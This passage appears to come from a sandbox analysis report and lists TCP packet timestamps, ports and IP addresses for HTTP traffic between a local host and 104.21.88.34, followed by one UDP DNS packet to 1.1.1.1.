                                                            Oct 4, 2023 15:58:00.539742947 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:00.539776087 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:00.539789915 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:00.539980888 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:00.539980888 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:00.539982080 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:00.688600063 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:00.688616037 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:00.688628912 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:00.688889027 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:00.688889980 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:00.689053059 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:00.837482929 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:00.837502003 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:00.837516069 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:00.837563038 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:00.837639093 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:00.878287077 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:00.878371954 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:00.986078978 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:00.986099958 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:00.986141920 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:00.986155033 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:00.986171007 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:00.986176014 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:00.986213923 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:01.027142048 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:01.027218103 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:01.215559006 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:01.215692043 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:01.216428041 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:01.216478109 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:01.364239931 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:01.364316940 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:01.364331961 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:01.364346027 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:01.364444017 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:01.364842892 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:01.364984035 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:01.513052940 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:01.513072968 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:01.513087034 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:01.513101101 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:01.513113976 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:01.513125896 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:01.513175964 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:01.513235092 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:01.513323069 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:01.513365030 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:01.513458014 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:01.661731958 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:01.661757946 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:01.661775112 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:01.661788940 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:01.661802053 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:01.661814928 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:01.661817074 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:01.661834002 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:01.661849022 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:01.661864042 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:01.661920071 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:01.661921024 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:01.661936045 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:01.661963940 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:01.664648056 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:01.810349941 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:01.810360909 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:01.810384989 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:01.810405970 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:01.810417891 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:01.810450077 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:01.810461998 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:01.810461998 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:01.810475111 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:01.810484886 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:01.810509920 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:01.810534000 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:01.813287973 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:01.813347101 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:01.958988905 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:01.959001064 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:01.959017038 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:01.959026098 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:01.959037066 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:01.959045887 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:01.959055901 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:01.959067106 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:01.959172964 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:01.961749077 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:01.961920977 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:02.226826906 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:02.226969957 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:02.376198053 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:02.376221895 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:02.376230955 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:02.376239061 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:02.376247883 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:02.376255989 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:02.376264095 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:02.376272917 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:02.376281977 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:02.376364946 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:02.525010109 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:02.525026083 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:02.525046110 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:02.525089979 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:02.525096893 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:02.525110960 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:02.525129080 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:02.525134087 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:02.525162935 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:02.525191069 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:02.525203943 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:02.525213957 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:02.525248051 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:02.525260925 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:02.525273085 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:02.525320053 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:02.673510075 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:02.673707008 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:02.673934937 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:02.673947096 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:02.674037933 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:02.822248936 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:02.822261095 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:02.822422028 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:02.822568893 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:02.822639942 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:02.822681904 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:02.822691917 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:02.822719097 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:02.822743893 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:02.822760105 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:02.822771072 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:02.822777987 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:02.822813034 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:02.971266031 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:02.971278906 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:02.971313000 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:02.971357107 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:02.971404076 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:02.971414089 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:02.971481085 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:02.971492052 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:02.971501112 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:02.971498966 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:02.971554041 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:02.971565008 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:02.971621037 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:02.971653938 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:02.971703053 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:03.237447977 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.237591982 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:03.386292934 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.386308908 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.386315107 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.386332989 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.386359930 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.386377096 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.386404991 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:03.386414051 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.386405945 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:03.386470079 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.386492014 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:03.386508942 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:03.386517048 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.386631012 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:03.536752939 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.536767960 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.536777973 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.536782980 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.536792040 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.536808968 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.536828041 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.536859035 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:03.536917925 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:03.536937952 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.536992073 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.537002087 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.537012100 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.537020922 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.537034035 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:03.537045002 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:03.537081957 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:03.537753105 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:03.685592890 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.685626984 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.685638905 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.685648918 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.685658932 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.685667992 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.685676098 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.685686111 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.685694933 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.685703993 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.685713053 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.685750008 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.685822964 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:03.685823917 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:03.685823917 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:03.685944080 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:03.686588049 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.686625957 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:03.686660051 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:03.834286928 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.834347963 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.834359884 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.834420919 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.834448099 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.834578991 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:03.835160017 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.835336924 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:03.983743906 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.983763933 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.983773947 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.983784914 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.983793974 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.983803034 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.983813047 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.983822107 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.984016895 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.984020948 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:03.984069109 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:03.984155893 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:04.163698912 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.163852930 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:04.312839031 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.312854052 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.312897921 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.312911034 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.312921047 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.312966108 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.313051939 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.313091993 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:04.313216925 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:04.462013006 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.462196112 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:04.462272882 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.462595940 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:04.611232042 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.611257076 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.611485004 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.611605883 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:04.761475086 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.761492968 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.761661053 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:04.761706114 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.761718035 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.761775970 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:04.910245895 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.910263062 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.910268068 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.910275936 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.910284996 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.910330057 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.910340071 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.910350084 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:04.910350084 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:04.910464048 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:05.065999985 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:05.164649963 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:05.164855957 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:05.165110111 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:05.165467024 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:05.214581013 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:05.314302921 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:05.314500093 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:05.314510107 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:05.314558029 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:05.314656973 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:05.314698935 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:05.463164091 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:05.463191986 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:05.463299036 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:05.611989021 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:05.612039089 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:05.612214088 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:05.761017084 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:05.761035919 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:05.761045933 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:05.761055946 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:05.761066914 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:05.761077881 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:05.761123896 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:05.761169910 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:05.909851074 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:05.909883976 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:05.909893990 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:05.909902096 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:05.909910917 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:05.909924030 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:05.909976006 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:06.178016901 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.178144932 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:06.326761961 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.326782942 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.326793909 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.326803923 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.326813936 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.326823950 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.326833010 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.326924086 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:06.475572109 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.475588083 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.475600004 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.475610971 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.475620985 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.475630045 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.475640059 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.475661993 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:06.475713968 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:06.475728989 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:06.624408960 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.624425888 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.624435902 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.624445915 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.624455929 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.624655962 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:06.773262024 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.773279905 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.773288012 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.773297071 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.773308039 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.773324966 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.773492098 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:06.922204971 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.922234058 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:06.922245026 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:08.536003113 CEST8049687104.21.88.34192.168.2.4
                                                            Oct 4, 2023 15:58:08.545341015 CEST4968780192.168.2.4104.21.88.34
                                                            Oct 4, 2023 15:58:08.546282053 CEST4968380192.168.2.4208.95.112.1

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Oct 4, 2023 15:57:52.330095053 CEST5447753192.168.2.41.1.1.1
